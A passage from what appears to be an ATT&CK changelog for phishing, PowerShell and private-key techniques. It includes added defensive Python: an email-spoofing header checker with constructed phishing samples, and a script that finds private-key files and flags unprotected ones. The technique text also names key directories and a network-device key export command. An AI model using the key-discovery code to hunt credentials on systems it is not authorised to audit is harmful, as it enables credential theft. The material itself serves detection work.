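Command-line matching only sees enumeration that goes through a shell; BloodHound collectors and LDAP tooling query the directory directly, which is why the entry also lists Group Enumeration and Application Log as sources. On a domain controller the complementary signal is a burst of LDAP queries for `(objectClass=group)` or the Directory Service Access event (4662) against group objects from a workstation that normally issues none.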

[T1566] Phishing

Current version: 2.3

Version changed from: 2.2 → 2.3


Old Description
Adversaries may send phishing messages to gain access to victim systems. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass malware spam campaigns.

Adversaries may send victims emails containing malicious attachments or links, typically to execute malicious code on victim systems. Phishing may also be conducted via third-party services, like social media platforms. Phishing may also involve social engineering techniques, such as posing as a trusted source.

New Description
Adversaries may send phishing messages to gain access to victim systems. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass malware spam campaigns.

Adversaries may send victims emails containing malicious attachments or links, typically to execute malicious code on victim systems. Phishing may also be conducted via third-party services, like social media platforms.

Phishing may also involve social engineering techniques, such as posing as a trusted source, as well as evasive techniques such as removing or manipulating emails or metadata/headers from compromised accounts being abused to send messages (e.g., [Email Hiding Rules](https://attack.mitre.org/techniques/T1564/008)).(Citation: Microsoft OAuth Spam 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014) Another way to accomplish this is by forging or spoofing(Citation: Proofpoint-spoof) the identity of the sender which can be used to fool both the human recipient as well as automated security tools.(Citation: cyberproof-double-bounce)

Victims may also receive phishing messages that instruct them to call a phone number where they are directed to visit a malicious URL, download malware,(Citation: sygnia Luna Month)(Citation: CISA Remote Monitoring and Management Software) or install adversary-accessible remote management tools onto their computer (i.e., [User Execution](https://attack.mitre.org/techniques/T1204)).(Citation: Unit42 Luna Moth)
Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_attack_spec_version | (none) | 3.1.0
x_mitre_deprecated | (none) | False
external_references | (none) | Australian Cyber Security Centre. (2012, December). Mitigating Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
dictionary_item_removed
STIX Field | Old value | New Value
external_references | CAPEC-98 | (none)
values_changed
STIX Field | Old value | New Value
modified | 2022-01-04 13:57:16.959000+00:00 | 2023-04-14 17:42:15.871000+00:00
description | Adversaries may send phishing messages to gain access to victim systems. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass malware spam campaigns. Adversaries may send victims emails containing malicious attachments or links, typically to execute malicious code on victim systems. Phishing may also be conducted via third-party services, like social media platforms. Phishing may also involve social engineering techniques, such as posing as a trusted source. | Adversaries may send phishing messages to gain access to victim systems. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass malware spam campaigns. Adversaries may send victims emails containing malicious attachments or links, typically to execute malicious code on victim systems. Phishing may also be conducted via third-party services, like social media platforms. Phishing may also involve social engineering techniques, such as posing as a trusted source, as well as evasive techniques such as removing or manipulating emails or metadata/headers from compromised accounts being abused to send messages (e.g., [Email Hiding Rules](https://attack.mitre.org/techniques/T1564/008)).(Citation: Microsoft OAuth Spam 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014) Another way to accomplish this is by forging or spoofing(Citation: Proofpoint-spoof) the identity of the sender which can be used to fool both the human recipient as well as automated security tools.(Citation: cyberproof-double-bounce) Victims may also receive phishing messages that instruct them to call a phone number where they are directed to visit a malicious URL, download malware,(Citation: sygnia Luna Month)(Citation: CISA Remote Monitoring and Management Software) or install adversary-accessible remote management tools onto their computer (i.e., [User Execution](https://attack.mitre.org/techniques/T1204)).(Citation: Unit42 Luna Moth)
external_references[1]['source_name'] | capec | ACSC Email Spoofing
external_references[1]['url'] | https://capec.mitre.org/data/definitions/98.html | https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
external_references[2]['source_name'] | Microsoft Anti Spoofing | CISA Remote Monitoring and Management Software
external_references[2]['description'] | Microsoft. (2020, October 13). Anti-spoofing protection in EOP. Retrieved October 19, 2020. | CISA. (n.d.). Protecting Against Malicious Use of Remote Monitoring and Management Software. Retrieved February 2, 2023.
external_references[2]['url'] | https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide | https://www.cisa.gov/uscert/ncas/alerts/aa23-025a
external_references[3]['source_name'] | ACSC Email Spoofing | cyberproof-double-bounce
external_references[3]['description'] | Australian Cyber Security Centre. (2012, December). Mitigating Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020. | Itkin, Liora. (2022, September 1). Double-bounced attacks with email spoofing . Retrieved February 24, 2023.
external_references[3]['url'] | https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf | https://blog.cyberproof.com/blog/double-bounced-attacks-with-email-spoofing-2022-trends
x_mitre_version | 2.2 | 2.3
iterable_item_added
STIX Field | Old value | New Value
external_references | (none) | {'source_name': 'Unit42 Luna Moth', 'description': 'Kristopher Russo. (n.d.). Luna Moth Callback Phishing Campaign. Retrieved February 2, 2023.', 'url': 'https://unit42.paloaltonetworks.com/luna-moth-callback-phishing/'}
external_references | (none) | {'source_name': 'Microsoft Anti Spoofing', 'description': 'Microsoft. (2020, October 13). Anti-spoofing protection in EOP. Retrieved October 19, 2020.', 'url': 'https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide'}
external_references | (none) | {'source_name': 'Microsoft OAuth Spam 2022', 'description': 'Microsoft. (2023, September 22). Malicious OAuth applications abuse cloud email services to spread spam. Retrieved March 13, 2023.', 'url': 'https://www.microsoft.com/en-us/security/blog/2022/09/22/malicious-oauth-applications-used-to-compromise-email-servers-and-spread-spam/'}
external_references | (none) | {'source_name': 'sygnia Luna Month', 'description': 'Oren Biderman, Tomer Lahiyani, Noam Lifshitz, Ori Porag. (n.d.). LUNA MOTH: THE THREAT ACTORS BEHIND RECENT FALSE SUBSCRIPTION SCAMS. Retrieved February 2, 2023.', 'url': 'https://blog.sygnia.co/luna-moth-false-subscription-scams'}
external_references | (none) | {'source_name': 'Proofpoint-spoof', 'description': 'Proofpoint. (n.d.). What Is Email Spoofing?. Retrieved February 24, 2023.', 'url': 'https://www.proofpoint.com/us/threat-reference/email-spoofing'}
external_references | (none) | {'source_name': 'Palo Alto Unit 42 VBA Infostealer 2014', 'description': 'Vicky Ray and Rob Downs. (2014, October 29). Examining a VBA-Initiated Infostealer Campaign. Retrieved March 13, 2023.', 'url': 'https://unit42.paloaltonetworks.com/examining-vba-initiated-infostealer-campaign/'}
x_mitre_contributors | (none) | Ohad Zaidenberg, @ohad_mz
x_mitre_contributors | (none) | Liora Itkin
x_mitre_contributors | (none) | Liran Ravich, CardinalOps
x_mitre_contributors | (none) | Scott Cook, Capital One
x_mitre_data_sources | (none) | Application Log: Application Log Content
iterable_item_removed
STIX Field | Old value | New Value
x_mitre_data_sources | Application Log: Application Log Content | (none)

[T1598] Phishing for Information

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description

Adversaries may send phishing messages to elicit sensitive information that can be used during targeting. Phishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Phishing for information is different from [Phishing](https://attack.mitre.org/techniques/T1566) in that the objective is gathering data from the victim rather than executing malicious code.

All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass credential harvesting campaigns.

Adversaries may also try to obtain information directly through the exchange of emails, instant messages, or other electronic conversation means.(Citation: ThreatPost Social Media Phishing)(Citation: TrendMictro Phishing)(Citation: PCMag FakeLogin)(Citation: Sophos Attachment)(Citation: GitHub Phishery) Phishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.

New Description

Adversaries may send phishing messages to elicit sensitive information that can be used during targeting. Phishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Phishing for information is different from [Phishing](https://attack.mitre.org/techniques/T1566) in that the objective is gathering data from the victim rather than executing malicious code.

All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass credential harvesting campaigns.

Adversaries may also try to obtain information directly through the exchange of emails, instant messages, or other electronic conversation means.(Citation: ThreatPost Social Media Phishing)(Citation: TrendMictro Phishing)(Citation: PCMag FakeLogin)(Citation: Sophos Attachment)(Citation: GitHub Phishery) Victims may also receive phishing messages that direct them to call a phone number where the adversary attempts to collect confidential information.(Citation: Avertium callback phishing)

Phishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages. Another way to accomplish this is by forging or spoofing(Citation: Proofpoint-spoof) the identity of the sender which can be used to fool both the human recipient as well as automated security tools.(Citation: cyberproof-double-bounce)

Phishing for information may also involve evasive techniques, such as removing or manipulating emails or metadata/headers from compromised accounts being abused to send messages (e.g., [Email Hiding Rules](https://attack.mitre.org/techniques/T1564/008)).(Citation: Microsoft OAuth Spam 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014)
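The new description adds sender spoofing as a way to fool "both the human recipient as well as automated security tools". The following is an added illustration of how a mail filter or SOC triage script checks for that; it is not part of ATT&CK or of any gateway product. It applies three checks to raw RFC 5322 headers: whether the visible From: domain aligns with the envelope sender recorded in Return-Path: (relaxed alignment, one may be a subdomain of the other), whether an upstream MTA recorded an SPF/DKIM/DMARC failure in Authentication-Results: (RFC 8601), and whether the display name embeds an address from a different domain than the real one. The three sample messages are constructed for the demonstration and use reserved example/.invalid domains.

```python
"""Triage raw e-mail headers for sender-spoofing indicators (added illustration).

Constructed samples only; no network access, no real SPF/DKIM evaluation.
The Authentication-Results: header is trusted as written, so in production
strip any copy of it that arrives from outside your own border MTA.
"""
import re
from email import message_from_string
from email.utils import parseaddr
from typing import List

# mechanism=verdict pairs inside an Authentication-Results header
AUTH_RESULT_RE = re.compile(r"\b(spf|dkim|dmarc)=([a-z]+)", re.IGNORECASE)
# an e-mail address smuggled into a display name
EMBEDDED_ADDR_RE = re.compile(r"[\w.+-]+@([\w-]+(?:\.[\w-]+)+)")
VERDICTS_OK = {"pass", "none", "neutral"}  # 'none' = unsigned / no record, not a failure


def _domain(addr: str) -> str:
    return addr.rsplit("@", 1)[1].lower() if "@" in addr else ""


def _aligned(a: str, b: str) -> bool:
    """Relaxed DMARC-style alignment: equal, or one is a subdomain of the other."""
    return a == b or a.endswith("." + b) or b.endswith("." + a)


def spoofing_indicators(raw_message: str) -> List[str]:
    """Return human-readable findings; an empty list means nothing suspicious."""
    msg = message_from_string(raw_message)
    findings = []

    display_name, from_addr = parseaddr(msg.get("From", ""))
    _, envelope_from = parseaddr(msg.get("Return-Path", ""))
    from_dom, env_dom = _domain(from_addr), _domain(envelope_from)

    # 1. header From: vs envelope sender
    if from_dom and env_dom and not _aligned(from_dom, env_dom):
        findings.append(f"envelope sender {env_dom} does not align with From: {from_dom}")

    # 2. verdicts recorded by the receiving MTA (folded header lines are fine)
    for header in msg.get_all("Authentication-Results", []):
        for mech, verdict in AUTH_RESULT_RE.findall(header):
            if verdict.lower() not in VERDICTS_OK:
                findings.append(f"{mech.lower()}={verdict.lower()}")

    # 3. display name that claims a different identity than the real address
    m = EMBEDDED_ADDR_RE.search(display_name)
    if m and not _aligned(m.group(1).lower(), from_dom):
        findings.append(f"display name claims {m.group(1).lower()} but address is {from_dom}")

    return findings


# Constructed samples (not real captures).
LEGIT = """\
Return-Path: <bounces@mail.example.com>
Authentication-Results: mx.example.net; spf=pass smtp.mailfrom=mail.example.com;
 dkim=pass header.d=example.com; dmarc=pass header.from=example.com
From: IT Helpdesk <helpdesk@example.com>
To: alice@example.net
Subject: Scheduled maintenance

No action needed.
"""

SPOOFED = """\
Return-Path: <bounce@mail-relay.invalid>
Authentication-Results: mx.example.net; spf=fail smtp.mailfrom=mail-relay.invalid;
 dkim=none; dmarc=fail header.from=example.com
From: "IT Helpdesk <helpdesk@example.com>" <helpdesk@mail-relay.invalid>
To: alice@example.net
Subject: Urgent: verify your password today

Call 555-0100 and confirm your credentials with our agent.
"""

ENVELOPE_ONLY = """\
Return-Path: <x@attacker.invalid>
From: CEO <ceo@example.com>
To: bob@example.net
Subject: Quick favour

Send me the customer list.
"""

if __name__ == "__main__":
    for name, sample in (("legit", LEGIT), ("spoofed", SPOOFED), ("envelope", ENVELOPE_ONLY)):
        print(name, spoofing_indicators(sample))
```

The third sample shows why the envelope check matters on its own: with no Authentication-Results header at all (a mail path that never evaluated SPF), the Return-Path mismatch is the only artefact left. Pair this with the callback-phishing note in the description: a phone number plus urgency language in the body of a message that already fails these checks is a strong signal.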
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2022-03-08 21:57:56.078000+00:002023-04-14 17:42:38.063000+00:00
descriptionAdversaries may send phishing messages to elicit sensitive information that can be used during targeting. Phishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Phishing for information is different from [Phishing](https://attack.mitre.org/techniques/T1566) in that the objective is gathering data from the victim rather than executing malicious code. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass credential harvesting campaigns. Adversaries may also try to obtain information directly through the exchange of emails, instant messages, or other electronic conversation means.(Citation: ThreatPost Social Media Phishing)(Citation: TrendMictro Phishing)(Citation: PCMag FakeLogin)(Citation: Sophos Attachment)(Citation: GitHub Phishery) Phishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.Adversaries may send phishing messages to elicit sensitive information that can be used during targeting. Phishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Phishing for information is different from [Phishing](https://attack.mitre.org/techniques/T1566) in that the objective is gathering data from the victim rather than executing malicious code. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. 
In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass credential harvesting campaigns. Adversaries may also try to obtain information directly through the exchange of emails, instant messages, or other electronic conversation means.(Citation: ThreatPost Social Media Phishing)(Citation: TrendMictro Phishing)(Citation: PCMag FakeLogin)(Citation: Sophos Attachment)(Citation: GitHub Phishery) Victims may also receive phishing messages that direct them to call a phone number where the adversary attempts to collect confidential information.(Citation: Avertium callback phishing) Phishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages. Another way to accomplish this is by forging or spoofing(Citation: Proofpoint-spoof) the identity of the sender which can be used to fool both the human recipient as well as automated security tools.(Citation: cyberproof-double-bounce) Phishing for information may also involve evasive techniques, such as removing or manipulating emails or metadata/headers from compromised accounts being abused to send messages (e.g., [Email Hiding Rules](https://attack.mitre.org/techniques/T1564/008)).(Citation: Microsoft OAuth Spam 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014)
external_references[1]['source_name']ThreatPost Social Media PhishingACSC Email Spoofing
external_references[1]['description']O'Donnell, L. (2020, October 20). Facebook: A Top Launching Pad For Phishing Attacks. Retrieved October 20, 2020.Australian Cyber Security Centre. (2012, December). Mitigating Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
external_references[1]['url']https://threatpost.com/facebook-launching-pad-phishing-attacks/160351/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
external_references[2]['source_name']TrendMictro PhishingAvertium callback phishing
external_references[2]['description']Babon, P. (2020, September 3). Tricky 'Forms' of Phishing. Retrieved October 20, 2020.Avertium. (n.d.). EVERYTHING YOU NEED TO KNOW ABOUT CALLBACK PHISHING. Retrieved February 2, 2023.
external_references[2]['url']https://www.trendmicro.com/en_us/research/20/i/tricky-forms-of-phishing.htmlhttps://www.avertium.com/resources/threat-reports/everything-you-need-to-know-about-callback-phishing
external_references[3]['source_name']PCMag FakeLoginTrendMictro Phishing
external_references[3]['description']Kan, M. (2019, October 24). Hackers Try to Phish United Nations Staffers With Fake Login Pages. Retrieved October 20, 2020.Babon, P. (2020, September 3). Tricky 'Forms' of Phishing. Retrieved October 20, 2020.
external_references[3]['url']https://www.pcmag.com/news/hackers-try-to-phish-united-nations-staffers-with-fake-login-pageshttps://www.trendmicro.com/en_us/research/20/i/tricky-forms-of-phishing.html
external_references[5]['source_name']GitHub Phisherycyberproof-double-bounce
external_references[5]['description']Ryan Hanson. (2016, September 24). phishery. Retrieved October 23, 2020.Itkin, Liora. (2022, September 1). Double-bounced attacks with email spoofing . Retrieved February 24, 2023.
external_references[5]['url']https://github.com/ryhanson/phisheryhttps://blog.cyberproof.com/blog/double-bounced-attacks-with-email-spoofing-2022-trends
external_references[6]['source_name']Microsoft Anti SpoofingPCMag FakeLogin
external_references[6]['description']Microsoft. (2020, October 13). Anti-spoofing protection in EOP. Retrieved October 19, 2020.Kan, M. (2019, October 24). Hackers Try to Phish United Nations Staffers With Fake Login Pages. Retrieved October 20, 2020.
external_references[6]['url']https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwidehttps://www.pcmag.com/news/hackers-try-to-phish-united-nations-staffers-with-fake-login-pages
external_references[7]['source_name']ACSC Email SpoofingMicrosoft Anti Spoofing
external_references[7]['description']Australian Cyber Security Centre. (2012, December). Mitigating Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.Microsoft. (2020, October 13). Anti-spoofing protection in EOP. Retrieved October 19, 2020.
external_references[7]['url']https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdfhttps://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide
x_mitre_version1.11.2
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Microsoft OAuth Spam 2022', 'description': 'Microsoft. (2023, September 22). Malicious OAuth applications abuse cloud email services to spread spam. Retrieved March 13, 2023.', 'url': 'https://www.microsoft.com/en-us/security/blog/2022/09/22/malicious-oauth-applications-used-to-compromise-email-servers-and-spread-spam/'}
external_references{'source_name': 'ThreatPost Social Media Phishing', 'description': "O'Donnell, L. (2020, October 20). Facebook: A Top Launching Pad For Phishing Attacks. Retrieved October 20, 2020.", 'url': 'https://threatpost.com/facebook-launching-pad-phishing-attacks/160351/'}
external_references{'source_name': 'Proofpoint-spoof', 'description': 'Proofpoint. (n.d.). What Is Email Spoofing?. Retrieved February 24, 2023.', 'url': 'https://www.proofpoint.com/us/threat-reference/email-spoofing'}
external_references{'source_name': 'GitHub Phishery', 'description': 'Ryan Hanson. (2016, September 24). phishery. Retrieved October 23, 2020.', 'url': 'https://github.com/ryhanson/phishery'}
external_references{'source_name': 'Palo Alto Unit 42 VBA Infostealer 2014', 'description': 'Vicky Ray and Rob Downs. (2014, October 29). Examining a VBA-Initiated Infostealer Campaign. Retrieved March 13, 2023.', 'url': 'https://unit42.paloaltonetworks.com/examining-vba-initiated-infostealer-campaign/'}
x_mitre_contributorsOhad Zaidenberg, @ohad_mz
x_mitre_contributorsLiora Itkin
x_mitre_contributorsLiran Ravich, CardinalOps
x_mitre_contributorsScott Cook, Capital One
x_mitre_data_sourcesNetwork Traffic: Network Traffic Flow
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesNetwork Traffic: Network Traffic Flow

[T1059.001] Command and Scripting Interpreter: PowerShell

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-19 20:25:48.646000+00:002023-03-27 17:19:48.136000+00:00
external_references[2]['url']https://silentbreaksecurity.com/powershell-jobs-without-powershell-exe/https://web.archive.org/web/20190508170150/https://silentbreaksecurity.com/powershell-jobs-without-powershell-exe/
external_references[8]['url']http://www.sixdub.net/?p=367https://web.archive.org/web/20160327101330/http://www.sixdub.net/?p=367
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_data_sources[0]Script: Script ExecutionProcess: Process Creation
x_mitre_data_sources[2]Process: Process MetadataModule: Module Load
x_mitre_data_sources[3]Process: Process CreationScript: Script Execution
x_mitre_data_sources[4]Module: Module LoadProcess: Process Metadata
x_mitre_version1.21.3
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_contributorsRoss Brittain

[T1552.004] Unsecured Credentials: Private Keys

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description

Adversaries may search for private key certificate files on compromised systems for insecurely stored credentials. Private cryptographic keys and certificates are used for authentication, encryption/decryption, and digital signatures.(Citation: Wikipedia Public Key Crypto) Common key and certificate file extensions include: .key, .pgp, .gpg, .ppk., .p12, .pem, .pfx, .cer, .p7b, .asc.

Adversaries may also look in common key directories, such as `~/.ssh` for SSH keys on * nix-based systems or `C:\Users\(username)\.ssh\` on Windows. These private keys can be used to authenticate to [Remote Services](https://attack.mitre.org/techniques/T1021) like SSH or for use in decrypting other collected files such as email.

Adversary tools have been discovered that search compromised systems for file extensions relating to cryptographic keys and certificates.(Citation: Kaspersky Careto)(Citation: Palo Alto Prince of Persia)

Some private keys require a password or passphrase for operation, so an adversary may also use [Input Capture](https://attack.mitre.org/techniques/T1056) for keylogging or attempt to [Brute Force](https://attack.mitre.org/techniques/T1110) the passphrase off-line.

New Description

Adversaries may search for private key certificate files on compromised systems for insecurely stored credentials. Private cryptographic keys and certificates are used for authentication, encryption/decryption, and digital signatures.(Citation: Wikipedia Public Key Crypto) Common key and certificate file extensions include: .key, .pgp, .gpg, .ppk., .p12, .pem, .pfx, .cer, .p7b, .asc.

Adversaries may also look in common key directories, such as `~/.ssh` for SSH keys on * nix-based systems or `C:\Users\(username)\.ssh\` on Windows. Adversary tools may also search compromised systems for file extensions relating to cryptographic keys and certificates.(Citation: Kaspersky Careto)(Citation: Palo Alto Prince of Persia)

When a device is registered to Azure AD, a device key and a transport key are generated and used to verify the device’s identity.(Citation: Microsoft Primary Refresh Token) An adversary with access to the device may be able to export the keys in order to impersonate the device.(Citation: AADInternals Azure AD Device Identities)

On network devices, private keys may be exported via [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `crypto pki export`.(Citation: cisco_deploy_rsa_keys)

Some private keys require a password or passphrase for operation, so an adversary may also use [Input Capture](https://attack.mitre.org/techniques/T1056) for keylogging or attempt to [Brute Force](https://attack.mitre.org/techniques/T1110) the passphrase off-line. These private keys can be used to authenticate to [Remote Services](https://attack.mitre.org/techniques/T1021) like SSH or for use in decrypting other collected files such as email.
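The description lists the extensions and directories adversary tooling searches for, and notes that some keys are passphrase-protected and others are not. The following is an added, defender-side illustration of the same search (not an ATT&CK tool and not any of the cited malware): it walks a directory tree, picks up files by those extensions plus anything carrying a recognisable private-key header, and reports the format, whether a passphrase protects the key, and on POSIX whether group/others can read the file. It recognises PEM (PKCS#1/EC/DSA via the legacy `Proc-Type: 4,ENCRYPTED` marker, PKCS#8 plain or encrypted), the OpenSSH format (cipher name read from the `openssh-key-v1` blob), PuTTY `.ppk` (`Encryption:` line) and PGP armour (reported as unknown, since S2K protection needs packet parsing). `openssh_stub()` and `audit_demo()` build constructed, non-functional sample files so the audit can run without real keys.

```python
"""Locate private keys on disk and report whether they are passphrase-protected.

Added illustration; the key samples it generates are constructed stubs with no
usable key material inside.
"""
import base64
import os
import stat
import struct
import tempfile
from pathlib import Path
from typing import Dict, List, Optional, Tuple

# extensions from the ATT&CK description
KEY_EXTENSIONS = {".key", ".pgp", ".gpg", ".ppk", ".p12", ".pem", ".pfx", ".cer", ".p7b", ".asc"}
OPENSSH_MAGIC = b"openssh-key-v1\x00"


def _openssh_cipher(b64_body: str) -> str:
    """Cipher name from an OpenSSH key blob; 'none' means the key is stored in clear."""
    blob = base64.b64decode(b64_body)
    if not blob.startswith(OPENSSH_MAGIC):
        return "unknown"
    off = len(OPENSSH_MAGIC)
    (n,) = struct.unpack(">I", blob[off:off + 4])       # length-prefixed ciphername string
    return blob[off + 4:off + 4 + n].decode("ascii", "replace")


def classify_key(text: str) -> Optional[Tuple[str, Optional[bool]]]:
    """(format, passphrase_protected) for private-key content, or None if not a key."""
    if "PuTTY-User-Key-File" in text:
        enc = next((l.split(":", 1)[1].strip() for l in text.splitlines()
                    if l.startswith("Encryption:")), "none")
        return "putty", enc != "none"
    if "-----BEGIN OPENSSH PRIVATE KEY-----" in text:
        body = "".join(l.strip() for l in text.splitlines() if not l.startswith("-----"))
        return "openssh", _openssh_cipher(body) != "none"
    if "-----BEGIN PGP PRIVATE KEY BLOCK-----" in text:
        return "pgp", None                                # needs OpenPGP packet parsing
    if "-----BEGIN ENCRYPTED PRIVATE KEY-----" in text:
        return "pkcs8", True
    if "PRIVATE KEY-----" in text:                        # RSA/DSA/EC PEM or plain PKCS#8
        return "pem", "Proc-Type: 4,ENCRYPTED" in text
    return None


def audit_tree(root: str) -> List[Dict]:
    """Report every file under root that looks like key material."""
    findings = []
    for path in sorted(Path(root).rglob("*")):
        if not path.is_file():
            continue
        try:
            head = path.read_bytes()[:65536].decode("utf-8", "ignore")
        except OSError:
            continue
        kind = classify_key(head)
        if kind is None and path.suffix.lower() not in KEY_EXTENSIONS:
            continue
        mode = path.stat().st_mode
        findings.append({
            "path": str(path),
            "format": kind[0] if kind else "binary-or-unknown",   # .p12/.pfx land here
            "protected": kind[1] if kind else None,
            "readable_by_others": bool(mode & (stat.S_IRGRP | stat.S_IROTH)),
        })
    return findings


def openssh_stub(cipher: str = "none") -> str:
    """Constructed OpenSSH-format envelope carrying only the cipher name (no real key)."""
    blob = (OPENSSH_MAGIC + struct.pack(">I", len(cipher)) + cipher.encode()
            + struct.pack(">I", 4) + b"none")             # kdfname follows ciphername
    return ("-----BEGIN OPENSSH PRIVATE KEY-----\n" + base64.b64encode(blob).decode()
            + "\n-----END OPENSSH PRIVATE KEY-----\n")


def audit_demo() -> List[Dict]:
    """Write constructed samples into a throwaway directory and audit it."""
    root = tempfile.mkdtemp(prefix="keyaudit-")
    samples = {
        "id_rsa": "-----BEGIN RSA PRIVATE KEY-----\nMIIE...\n-----END RSA PRIVATE KEY-----\n",
        "id_ed25519": openssh_stub("aes256-ctr"),
        "deploy.ppk": "PuTTY-User-Key-File-3: ssh-ed25519\nEncryption: none\nComment: ci\n",
        "notes.txt": "nothing to see here\n",
    }
    for name, content in samples.items():
        with open(os.path.join(root, name), "w") as f:
            f.write(content)
    return audit_tree(root)


if __name__ == "__main__":
    for row in audit_demo():
        print(row)
```

Run `audit_tree("/home")` or `audit_tree(r"C:\Users")` as a privileged user to get the adversary's view of the estate; every row with `protected` false is a key that is usable the moment the file is read, and every row with `readable_by_others` true is usable by any local account. Network-device key export (`crypto pki export`) leaves no file on a host to find, which is why the updated detection text points at AAA logging for those platforms instead.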

Dropped Mitigations:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
x_mitre_deprecatedFalse
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User']
values_changed
STIX FieldOld valueNew Value
modified2020-03-29 21:36:36.613000+00:002023-04-12 23:52:08.194000+00:00
descriptionAdversaries may search for private key certificate files on compromised systems for insecurely stored credentials. Private cryptographic keys and certificates are used for authentication, encryption/decryption, and digital signatures.(Citation: Wikipedia Public Key Crypto) Common key and certificate file extensions include: .key, .pgp, .gpg, .ppk., .p12, .pem, .pfx, .cer, .p7b, .asc. Adversaries may also look in common key directories, such as ~/.ssh for SSH keys on * nix-based systems or C:\Users\(username)\.ssh\ on Windows. These private keys can be used to authenticate to [Remote Services](https://attack.mitre.org/techniques/T1021) like SSH or for use in decrypting other collected files such as email. Adversary tools have been discovered that search compromised systems for file extensions relating to cryptographic keys and certificates.(Citation: Kaspersky Careto)(Citation: Palo Alto Prince of Persia) Some private keys require a password or passphrase for operation, so an adversary may also use [Input Capture](https://attack.mitre.org/techniques/T1056) for keylogging or attempt to [Brute Force](https://attack.mitre.org/techniques/T1110) the passphrase off-line.Adversaries may search for private key certificate files on compromised systems for insecurely stored credentials. Private cryptographic keys and certificates are used for authentication, encryption/decryption, and digital signatures.(Citation: Wikipedia Public Key Crypto) Common key and certificate file extensions include: .key, .pgp, .gpg, .ppk., .p12, .pem, .pfx, .cer, .p7b, .asc. Adversaries may also look in common key directories, such as ~/.ssh for SSH keys on * nix-based systems or C:\Users\(username)\.ssh\ on Windows. 
